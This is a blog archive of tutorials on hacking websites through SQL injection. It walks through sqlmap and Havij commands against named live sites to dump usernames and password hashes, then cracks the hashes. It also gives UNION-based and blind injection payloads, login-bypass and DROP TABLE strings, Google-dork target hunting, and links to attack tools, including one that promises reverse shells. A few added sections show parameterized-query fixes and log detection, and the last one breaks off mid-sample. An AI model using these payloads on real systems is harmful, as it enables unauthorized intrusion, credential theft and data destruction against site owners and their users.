Showing posts with label Sql Injection. Show all posts

Saturday, August 17, 2013

HOW TO HACK A WEBSITE USING "SQLMAP" ON WINDOWS


In this tutorial, we will learn how to find a vulnerable link in a website, exploit that link by SQL injection, and take total control over the website. This includes access to the usernames and passwords database, defacing it, address forwarding and much more. This is the most powerful attack against any website and can create a world-wide mess if done for evil purposes.

So what are we waiting for? Let's begin...



Step 1 :

======

Find a SQL-injectable website to hack.

Simply put a ' after the parameter value in the URL; if you get a syntax error, the site is vulnerable.

I found a site to give you a clear example of the tool:

http://www.areyoureadytoorder.co.uk/review.php?id=280'

The site is vulnerable, so let's hack it.




Step 2 :

======


In this tutorial I will use Windows, so put this command in cmd.

Start sqlmap and type this command into it.

I made a directory in the Python folder named sqlmap, so this is:

+++++++++
command 1:
+++++++++

python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --dbs

Here -u gives the URL of your SQL-injectable website, and --dbs tells sqlmap to enumerate the names of the databases.


Step 3 : 
=====

So after getting the database name, to dump the tables type this command:

++++++++
command 2 :
++++++++

python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --tables -D aytro






Step 4 : 
=====

Now you want the columns that the table has, so let's dump the columns:

+++++++++
command 3 :
+++++++++

python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user




Step 5 : 
=====

So now you have the tables and columns of the website database; now it is time to dump the username and password from the website.

Put this command to get the username and password:

+++++++++
command 4 :
+++++++++

python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user --dump




So here are the usernames and passcodes to access the site, but the passwords are hashed; you need to crack them, and after that you gain access to the site.



Hope you guys enjoy the tutorial.

Tuesday, August 13, 2013

HOW TO INSTALL SQL Map ON WINDOWS




sqlmap is an automatic SQL injection tool.
So first
===================================



1. Download sqlmap from here (around 6-7 MB).

2. Download Python for Windows; click here (15 MB).




3. Now, while installing Python, install it to the "C:\python" directory (or any directory you wish, but remember the path); click next, next, next, OK ... :)



4. Extract the files from the sqlmap zip file.

You will see something like this in the folder:

5. Now go to the directory where Python is installed (for me, C:\Python).

   You'll see something like this:




6. Now, as you saw in the screenshot, create a folder here named "sqlmap".

7. Now go to the folder where you extracted sqlmap and copy all files and folders, as in the screenshot:

8. Now paste the files and folders into the new sqlmap folder you created inside the Python directory, like this:





9. After pasting, go to the desktop, right click >> New >> Shortcut,
    and in the location bar type "cmd" (without quotes); click next, next, OK.

 (Rename it as you want.)

     



 10. Now go to the properties of the shortcut created on your desktop, and in the "Start in:" field type C:/Python instead of %windir% and click OK,

as below:

Now you are almost done...

Open the shortcut,
and to use sqlmap just type the following command (as in the pic):

python sqlmap/sqlmap.py




Hope It Helps

Friday, August 2, 2013

Sql Poizon Free Download


SQL POIZEN



=> The SQL Poizon tool includes PHP, ASP, RFI and LFI dorks. You can scan sites by Google dorks, and fix vulnerable sites. This software allows you to scan sites based on country. After scanning, you can crawl the sites to check for vulnerabilities. You can also inject with this tool. Let's see a screenshot of this tool:














Thursday, August 1, 2013

Gr3eNoX Exploit Scanner SQLi/XSS/LFi/RFi v1.1




Updates
=======
  • XSS Scanner
  • RFi Scanner Bug fixed
  • Remove Duplicate algorithm changed



Wednesday, July 31, 2013

SQL INJECTION WITH HAVIJ + DOWNLOAD FULL VERSIONS

Note: for security reasons the link is censored.
=======================================


Step 1 :
----------

Find a vulnerable site using a Google dork.

You can find a list here:

 http://safehacking4mas.blogspot.in/2011/05/useful-dork-list-for-sql-injection.html

Check whether the site is vulnerable or not using a ' after the id or other parameter.

If you get an error, the site is vulnerable to SQL injection attack. If not, then try another site.


Step 2:
---------

Download the full version which you would like.
=======================================








Step 3:
----------

Now open the Havij tool.

Put the vulnerable link in the bar and start attacking.




Step 4:
----------

The tool then tries automated queries on the website and provides the database name.




Step 5:
----------

Go to the Tables tab, click on the database name and click on Get Tables.

Next click on Get Columns.

And you get all the columns that you want.

In there you will see the admin and pass or id fields.

Just tick them and click on Get Data.

After some time you have the admin username and password of the site.

Mostly the password is hashed because of security.


Step 6:
----------

After you have got the login details, you need the login panel of the site.

Go to the Find Admin tab and search.

It takes some time, and then you have the admin panel link of the site; just go to the link, login and do what you want with the site.


Wednesday, May 25, 2011

What Is SQL injection???


SQL Injection

SQL injection is the most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that expose unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.

The technique is powerful enough not only to expose information to the user but also to modify and delete content, which could prove disastrous to the company.

SQL injection vulnerabilities have three forms:


Incorrectly filtered special characters: escape characters




This form of SQL injection occurs when the user manipulates the SQL statements using characters such as '. For instance, consider that you need to enter a username and password while logging into your account. The SQL statement generated will be:

"SELECT * FROM users WHERE password = '" + password + "';"

Now suppose the username and/or password entered is ' or '1'='1. The SQL statement reaching the back end will be:

SELECT * FROM users WHERE password = '' or '1'='1';

Look closely at this statement. The database interprets it as: select everything from the table "users" where the password field equals '' or 1=1. During the authentication process this condition will always be true, as 1 always equals 1. In this way the user is given unauthorized access.


A list of some important inputs used by hackers for the SQL injection technique:

a) ' or 'a'='a
b) ' or 1=1 --
c) ' or 1=1; --
d) '; select * from *; --
e) ' (single quote; here we look at the error)
f) '; drop table users --

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):

a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%

Incorrectly handling input data type


This form of SQL injection occurs when the user input is not strongly typed, i.e. the input by the user is not checked for the data type constraint. For example, consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, the input must be checked for whether it is numeric or not. If it is not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:

"SELECT * FROM user WHERE telephone = " + input + ";"

Now if I can input alphanumeric data, say "11111111;DROP TABLE user", then I have embedded an SQL statement to delete the entire table "user". This might prove detrimental to the company!

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:

1. ' having 1=1 --
2. ' group by user.id having 1=1 --
3. ' group by users.id, users.username, users.password, users.privs having 1=1 --
4. ' union select sum(users.username) from users --
5. ' union select sum(id) from users --
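The two forms described above (an escape character in a string field, and an unchecked data type in a numeric field) side by side with their fixes, as an added example that is not part of the original post. It uses Python's sqlite3 module with a constructed in-memory users table; the table, its rows and the function names are assumptions for the illustration. sqlite3's execute() refuses stacked statements, so the numeric case uses a tautology ("0 OR 1=1") rather than the stacked DROP TABLE from the text; the point, that an unchecked type lets SQL through, is the same.

```python
import sqlite3

# Constructed sample data (assumption for this example, not from the page).
SAMPLE_USERS = [
    ("alice", "s3cret", 5551234),
    ("bob", "hunter2", 5559876),
]


def make_db():
    """Build a throwaway in-memory database with a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, telephone INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, password):
    # Builds the query exactly as the post describes: the input is glued into the SQL string,
    # so a quote in it ends the literal and the rest is parsed as SQL.
    sql = "SELECT username FROM users WHERE password = '" + password + "' ORDER BY username"
    return [row[0] for row in conn.execute(sql)]


def safe_login(conn, password):
    # Parameterized query: the driver sends the value separately from the SQL text,
    # so quotes inside it are data, never syntax.
    sql = "SELECT username FROM users WHERE password = ? ORDER BY username"
    return [row[0] for row in conn.execute(sql, (password,))]


def vulnerable_phone_lookup(conn, telephone):
    # Numeric column, but the input is never checked to be numeric (the second form in the post).
    sql = "SELECT username FROM users WHERE telephone = " + telephone + " ORDER BY username"
    return [row[0] for row in conn.execute(sql)]


def safe_phone_lookup(conn, telephone):
    # Enforce the data type before the value gets near the query, then bind it.
    if not telephone.isdigit():
        raise ValueError("telephone must be numeric")
    sql = "SELECT username FROM users WHERE telephone = ? ORDER BY username"
    return [row[0] for row in conn.execute(sql, (int(telephone),))]


def demo():
    """Run each lookup against the same data and report what got through."""
    conn = make_db()
    results = {
        # The post's tautology: '' or '1'='1' matches every row.
        "vuln_login": vulnerable_login(conn, "' or '1'='1"),
        # Same input bound as a parameter matches nobody.
        "safe_login": safe_login(conn, "' or '1'='1"),
        # Unchecked numeric field: telephone = 0 OR 1=1 returns everyone.
        "vuln_phone": vulnerable_phone_lookup(conn, "0 OR 1=1"),
    }
    try:
        safe_phone_lookup(conn, "0 OR 1=1")
        results["safe_phone_rejected"] = False
    except ValueError:
        results["safe_phone_rejected"] = True
    results["safe_phone_exact"] = safe_phone_lookup(conn, "5559876")
    conn.close()
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The two safe variants are the whole fix: bind values instead of concatenating them, and validate the type of anything that is supposed to be a number. Escaping quotes by hand (the approach the post's third section alludes to) is fragile precisely because it has to be done correctly at every call site.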

Vulnerabilities inside the database server


Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server's real_escape_chars() functions.

If the database server is not properly configured, then access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
' union select @@version,1,1,1--

Extended Stored Procedure Attacks

1. sp_who: this will show all users that are currently connected to the database.
2. xp_readmail, , , , ,@peek='false' : this will read all the mails and leave the message as unread.

In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in the software application at the database layer.

Learn How To Hack Websites , Mysql Injection Tutorial

SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial I will be showing you the steps to carry out the attack on a MySQL database.
Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it to /*, as they are two different prefixes and if one works the other tends not to. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page, for example 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these don't work, try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you don't have to guess. If this command is successful then you should be presented with a page full of usernames and passwords from the website.

How To Find The Websites Having SQL injection Vulenerability


So you have always wondered that SQL injection is such a nice approach to hacking a website, but you must not have found any website that has a login form with a SQL injection vulnerability.

So here's the trick how to find one: just make a Google search - "admin login.asp" (without quotes)
..Here ASP stands for Active Server Pages.. ASP is a program by Microsoft that uses server-side scripting languages like VBScript and runs on MS-SQL Server...and the search will return the administrator login pages having extension .asp

After reaching any login page you just have to use the traditional SQL injection methods... where the user name will be either admin or administrator (since our goal is to gain admin privileges), and in the password field you can use the script below..
anything' OR 'x'='x
After gaining admin privileges, just do whatever you want.. delete their records, or change the password.. etc... That's what hacking is about...

Monday, May 23, 2011

How to hack websites using Auto SQL I Helper V.2.7


Let's start.
First you need to find a potential website that you think might be possible to hack. Remember that some websites are simply unhackable.
After you find your website (better if it ends with "article.php?id=[number]"), for example: "http://encycl.anthropology.ru/article.php?id=1"

I will explain my tutorial on how to hack this website.

Check if your website can be hacked by trying to go to this address:
http://encycl.anthropology.ru/article.php?id='1 <------ notice the ' before the number 1.

you should get this message:

Code:
Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

This means that this website can be hacked, because you get an error.

Now open your SQL I Helper V.2.7
and write the link:
http://encycl.anthropology.ru/article.php?id=1 <---- without the '
here

and press the inject button.

Now you should wait until the tool finishes searching for columns. Time may vary depending on your connection speed, your PC speed, and the number of columns in the website.
So now you should have this:



then select "Get database" and you get this:
http://i40.tinypic.com/znq9tz.jpg

Now select any element from the "database name" box and press the "Get tables" button; I will select "anthropo_encycl":

then select any element from the "table name" box and press the "Get columns" button; I will select "user":

then select any elements you want from the "columns name" box and press "Dump Now"; I will select "usr_login" and "usr_pass"

After clicking "Dump Now", you should see this new window

Now copy the hash on a piece of paper and go to this website:
http://www.md5crack.com/

enter the hash and press the button "Crack that hash baby!" and you should get the source of the hash.
hash:21232f297a57a5a743894a0e4a801fc3
username: admin

hash:202cb962ac59075b964b07152d234b70
pass: 123

It took me some time discovering the tool and preparing this tutorial.
I am sorry for the small pics, but I have a very limited connection and cannot upload big pics.
I am interested to know your comments; +rep me if you like it and think it is useful.


Saturday, May 21, 2011

Collection Of Some Other SQL Injection Tools


MySQL Dump v1



*******************************************


*******************************************




DOWNLOAD:
*************

http://www.4shared.com/file/hE105hC1/MySQL_Dump_v1.html

SQL Exploit Scanner



Sql Exploit Scanner -V3-
-----------------------------------------------------------------------------

Hi and thanks for downloading my SQL Exploit Scanner V3

First of all I have been working on a few updates and a few bug fixes for this tool, so a small appreciation would be great

============= NEW UPDATE LIST ==================

Updated Both Search Boxes so they both work now and no more error 503
Updated Darkie Search Engine Now you can use blackie instead of just Google
Updated Return List for google
Updated Dorks Search Option so now you can type in "inurl" as dork name so it will look like this
Example.... inurl:page.php?id= instead of just page.php?id=

Tidied up the code so you get fewer Errors
Improved Listings
Made Close Program by app available again ( you don't have to use File> Exit any more )


============= How to use custom Dorks list ====================

when you extract sql exploit scanner V3 you will see a text file named
"MHDorks.txt"
Simply replace the contents of this list with your own; do not rename the file or it will not work




====OLD UPdate List ======

Updated DropDown Box: if you are using one, the other one becomes unusable
Updated Search Function so both Drop Down Boxes work as search and as custom List
Updated Add your own custom dorks list ( simply edit MHDorks.txt with list of your own dorks )
Updated List Return in list box now it auto removes duplicate URL's so you don't have to visit same site twice

----IMPORTANT UPDATE-----
This was what everyone was waiting for
Updated Tool: made an add-on for SQL Helper 2.7 Cleaned Version ( Means No virus, back door or keyloggers )
you can use it with any AVG enabled and it runs like it should; I have been testing it on my pc under KAV 2010
and not once has my KAV come up with any virus warnings...

---- Removed Functions List ------
Removed Minimise or Close Box from the app itself; now you have to click File and Exit
there is a reason why I did this: in order for sql helper 2.7 to work next time, this is the way I had to have it exit, by option
I'm working on this issue and I hope I will fix it in my next Update

------ Still Been Developed --------
Feed back given by guys over at HF Boards
Save Settings Function
Other Search Engine function like blackie a.k.a google's old engine


---- Important Note: Please do not try and edit any files you are not supposed to; I'm sure you will find 1 --------------
---- Please do not remove any files or the app might stop working, and sql helper infected ---------------

Many People been asking me what does this tool do here are some Q and A

Q. What does this tool do
A. Look in the Help Section of the Tool; it will explain everything

Q. The Tool does not work for me; what should I do
A. A few things this could be an issue with.. the main one is the .NET Framework; you need to go and download that 2.2 server version
another issue might be a missing .ocx file; go on Google and whatever file it's telling you is missing, download it and put it in the same place as my proggy
and the final and most common issue is Vista users ( guys remember you need to right click and run as admin ) " Poop Vista "..

DOWNLOAD:
**************

http://www.4shared.com/file/S56uDhuU/V3MoHackzSQLExplt.html

Sql Map Injection Tool



“sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.“



This is the change log:

Rewritten SQL injection detection engine (Bernardo and Miroslav).
Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav).
Added full support for both time-based blind SQL injection and error-based SQL injection techniques (Bernardo and Miroslav).
Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
Implemented support for Firebird (Bernardo and Miroslav).
Implemented support for Microsoft Access, Sybase and SAP MaxDB (Miroslav).
Extended old '--dump -C' functionality to be able to search for specific database(s), table(s) and column(s), --search switch (Bernardo).
Added support to tamper injection data with --tamper switch (Bernardo and Miroslav).
Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack (Miroslav).
Added support to enumerate roles on Oracle, --roles switch (Bernardo).
Added support for SOAP based web services requests (Bernardo).
Added support to fetch unicode data (Bernardo and Miroslav).
Added support to use persistent HTTP(s) connection for speed improvement, --keep-alive switch (Miroslav).
Implemented several optimization switches to speed up the exploitation of SQL injections (Bernardo and Miroslav).
Support to test and inject against HTTP Referer header (Miroslav).
Implemented HTTP(s) proxy authentication support, --proxy-cred switch (Miroslav).
Implemented feature to speedup the enumeration of table names (Miroslav).
Support for customizable HTTP(s) redirections (Bernardo).
Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, --replicate switch (Miroslav).
Support to parse and test forms on target url, --forms switch (Bernardo and Miroslav).
Added switches to brute-force tables names and columns names with a dictionary attack, --common-tables and --common-columns. Useful for instance when system table 'information_schema' is not available on MySQL (Miroslav).
Basic support for REST-style URL parameters by using the asterisk (*) to mark where to test for and exploit SQL injection (Miroslav).
Added safe URL feature, --safe-url and --safe-freq (Miroslav).
Added --text-only switch to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content (Miroslav).
Implemented few other features and switches (Bernardo and Miroslav).
Over 100 bugs fixed (Bernardo and Miroslav).
Major code refactoring (Bernardo and Miroslav).
User’s manual updated (Bernardo).


DOWNLOAD:
************

Hack Websites With REAL Sql V0.3

Hack Websites With REAL Sql


REAL SQL was programmed by me in REALBasic.


What is does is search through Google, using Google Dorks and tries each website for an SQL Injection Vulnerability and if it is successful it will return the vulnerable link to you!


This is the main GUI of the application, and in later screenshots I will show you its features.




Here is the search function, and you can see it is returning a vulnerable URL.



The search is complete and there were 3 vulnerable URLs found!



This is the save button making a .txt file of all the working links


DOWNLOAD:
*************

http://www.4shared.com/file/Z6GA0IfK/REAL_Sql_-_V03_pass-Logie.html

password - Logie

SQL Injection Helper V2


Sqlninja 0.2.3 released



Sqlninja 0.2.3 released - Advanced Automated SQL Injection Tool for MS-SQL
Sqlninja is a tool written in PERL to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.

Features

* Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, authentication mode)
* Bruteforce of 'sa' password, both dictionary-based and incremental
* Privilege escalation to 'sa' if its password has been found
* Creation of a custom xp_cmdshell if the original one has been disabled
* Upload of netcat.exe (or any other executable) using only 100% ASCII GET/POST requests, so no need for FTP connections
* TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
* Direct and reverse bindshell, both TCP and UDP
* DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames
* Evasion techniques, in order to obfuscate the injected code and confuse/bypass signature-based IPS and application firewalls

Fancy going from a SQL Injection to a full GUI access on the DB server? What about extracting password hashes on the fly? Take a few SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have the latest release of sqlninja! See it in action here.

What’s new in 0.2.3?

* A Metasploit3 wrapper, which allows the user to use SQL Injection to execute Metasploit payloads on the remote DB server
* Several other minor improvements

You can download sqlninja 0.2.3 here:


Blind SQL Injection Tool



Blind injection tutorial for mysql ,i haven't written a sql tut in awhile so ill add a blind injection tutorial for mysql, the same idea will work in ms-sql with similar commands. Blind injection is a little more complicated/time consuming, but when your injection is multi-select and union isn't possible this is your next best bet. I will go over how to pull version, how to guess table and column names, and finally how to actually pull column data out of the database.Do not try to use a comment (ie: --, or /*) when doing blind injection, its not needed and may makes things worse. There are automating tools for blind injections, I like knowing how blind attacks work so i can do things by hand when needed. I personally use a combination of doing blind injections by hand and by using automating tools to pull the actual content from a column. Pulling data from mysql using blind attack is slow, even when using automating tools, but when no other option is available its still a useful method for sites you really want ;)I will be using an example url http://site.com/news.php?id=12when we visit the url we see a news article with a title of and the article content. We test the injection is subject to a blind attack by going to
CODE
news.php?id=12 and 1=1we should see the same url and contents, then try going to
CODE
news.php?id=12 and 1=2on a successful injection you will see content missing, could be as obvious as the title/article missing or as obscure as maybe the number of pages of the article disappearing. You may have to hit back and forward on your browser to look for differences. If our injection was on a string variable instead of doing news.php?id=12 and 1=1 / news.php?id=12 and 1=2 we would be doing news.php?id=12' and 1='1 / news.php?id=12' and 1='2 this is to keep the syntax error less.For our example lets say just say the title/content of the article disappears when we did 1=2 but was still there when we did 1=1. we can see our input is affecting the mysql returned data. no data is going to match 1=2 so nothing is returned, when the statement is true the content normally being returned from the rest of the sql statement gets returned. So we now string together questions in true/false methods and when the content is displayed on the page we know the question was true, and when its not its false. I will refer to 'page loading normally' as the content is being returned from the mysql database and the statement is TRUE.--Getting mysql @@VERSION--The first question i usually ask is for the version number of mysql, it helps knowing what commands are available as different mysql have different options available.
CODE
news.php?id=12 and substring(@@version,1,1)=4what i did here was get the first character of @@version and compare it to =4, if its TRUE statement we should see the news article otherwise the page will be missing content as like we did 1=2. The page is missing content so i change the 4 to a 5 and try again, this time the page loads normally with the content there so we know were dealing with Mysql5. if 4 and 5 don't work, try 3. If its mysql3 its nearly impossible to get any data out since subselects and union isn't possible making these further commands useless.--Check if we have access to mysql.user--Next i just want to test subselects, sometimes the word "select" is blacklisted.
CODE
news.php?id=12 and (select 1)=1if subselects work you should see the page load normally. Next i want to see if we are an elevated user that has access to mysql.user.
CODE
news.php?id=12 and (SELECT 1 from mysql.user limit 0,1)=1If we have access to mysql.user the query will return 1, if we dont it will error and not return anything. So if the page loads normally here we have access to mysql.user and may be useful to pull mysql hashes later on or try using load_file() and OUTFILE. Also note i used 'limit 0,1', subselects can only return 1 row of data or they will error and fail so don't forget it.--Checking for valid tables--In our example we have mysql5, but pulling data from information_schema is slow in a blind attack so might want to just try guessing a few tables. Or you may be using mysql4 and be required to guess tables/column to get any further.
CODE
news.php?id=12 and (SELECT 1 from users limit 0,1)=1

I tried guessing the table users; if there is a table called users the page will load normally. Just change the table to guess other table names.

--Checking for column names within a found table--

If you got lucky and guessed some good table names, we can now try guessing some columns within those tables. The users table has already been found using the above method; don't skip to this step unless you have found your tables already.

CODE
news.php?id=12 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1

What I did here was merge '1' with the column password, then use substring to cut it back down to just the first character, which should be 1 if the column password exists. Change the column password to others to guess other column names.

--Pulling data from found table/columns--

OK, this is the actual part of pulling data from those tables, and this is where it becomes time consuming. I use automated tools for this part, but knowing how to do it by hand makes you a better SQL'er =) I'm going to pull the username,password columns from the table users. I already found username,password,email,userid to be valid columns within the table using the above method.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100

OK, what I did here was first pull the username/password I want using a where clause; otherwise you could do limit 0,1 to pull the first user out. Subselects are limited to 1 row: if your subselect will return more than 1 row it will error and this will fail, so it's not a bad idea to stick limit 0,1 at the end if you're not sure how many rows are going to be returned. Then outside of my subselect I have substring(,1,1), which trims my subselect down to just the first character, 1 character in length. Then ascii() converts that 1 character to an ASCII numeric value, which I compare using the greater-than symbol, > 100.

So in the above example, if the ASCII value was greater than 100 the page will load normally. In our case the page doesn't load with the content, so we know the first char is less than 100; we guess again.

CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>80

The page loads normally with >80: true. We go higher.

CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>90

False, go lower.

CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>85

True, go higher.

CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>86

False. We have now narrowed it down to greater than 85 but not greater than 86, so we know our number is 86! You can test with =86 if you want to be sure; it may be confusing at first. Using an ASCII converter we know char(86) is 'V', so the first letter of our returned row is 'V', exciting lol. To get the next character we modify the substring.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>100

I changed the substring ,1,1 to ,2,1. Now it returns the 2nd character of the subselect, 1 character in length, and we do the same thing again as for the first char. This time >100 returned true, so we raise the number.

CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>120

False, lower the 120.

CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>110

False, lower.

CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>105

False, lower.

CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>103

True, higher.

CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>104

True. We see that it's greater than 104 and NOT greater than 105, making the number we want 105. char(105) is 'i', so we have 'Vi' so far. As you can see we did 11 requests and only got 2 characters from the database, and I actually guessed the numbers pretty fast; it may take a lot more requests to narrow it down. See how pulling a user/password hash can be time consuming. Keep incrementing the substring until you get to the end, where >0 will return false.

--Automating the pulling of data--

I use sqlmap .4; .5 has a few bugs and doesn't always work correctly for me. There are other tools made for blind injection as well. To pull the same username and password in sqlmap you use this command.
CODE
./sqlmap.py -u "http://site.com/news.php?id=12" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(username,0x3a,password) from users where userid=2)"

-u is the URL you're going to inject. -p is the parameter that is injectable, id. -a will pull a random user-agent from a text file; otherwise it'll use the default sqlmap user-agent, which is not a good idea. -v1 is verbose. --string is the unique string that appears when the condition is TRUE; you find this by doing 1=1 and 1=2 and pasting a small bit of text that only shows when it's TRUE. -e is the command you want to evaluate; we want to do a subselect, so be sure to add ( ) around your SELECT statement.

Doing the above sqlmap command may take 5 minutes or so to finish, but that beats the 30 minutes or so it would take by hand. sqlmap can also get tables/columns if you're accessing MySQL 5, but do you really need the complete table structure? Use -e to run your own commands to get only the tables/columns of interest.

CODE
./sqlmap.py -u "http://site.com/news.php?id=12" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(table_schema,0x3a,table_name,0x3a,column_name) from information_schema.columns where column_name like 0x257061737325 limit 0,1)"

sqlmap doesn't like handling quotes even if your injection target has magic quotes off, so use hex: 0x257061737325 is '%pass%' hexed. Now we just run this and increment our limit to get the next rows. This is much faster than using sqlmap to get ALL tables and then trying to figure out which tables have what we may be looking for.
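From the other side of the wire, here is an added example (my own, not from this post or from sqlmap) of what the probes above look like in a web server's access log and how to pick them out: it parses Apache combined-format lines, decodes each query parameter, matches the 1=1/1=2, substring/ascii, subselect and @@version/mysql.user/information_schema patterns used above, and counts per client the requests that differ only in their numeric literals, since a character-by-character bisection leaves a run of such near-identical requests. The log lines, client addresses and paths are constructed for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines (not from the post): one client replays the
# post's 1=1 / 1=2 probe, then bisects the first character of a row; the other is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Aug/2013:10:00:02 +0000] "GET /news.php?id=12%20and%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Aug/2013:10:00:03 +0000] "GET /news.php?id=12%20and%201=2 HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
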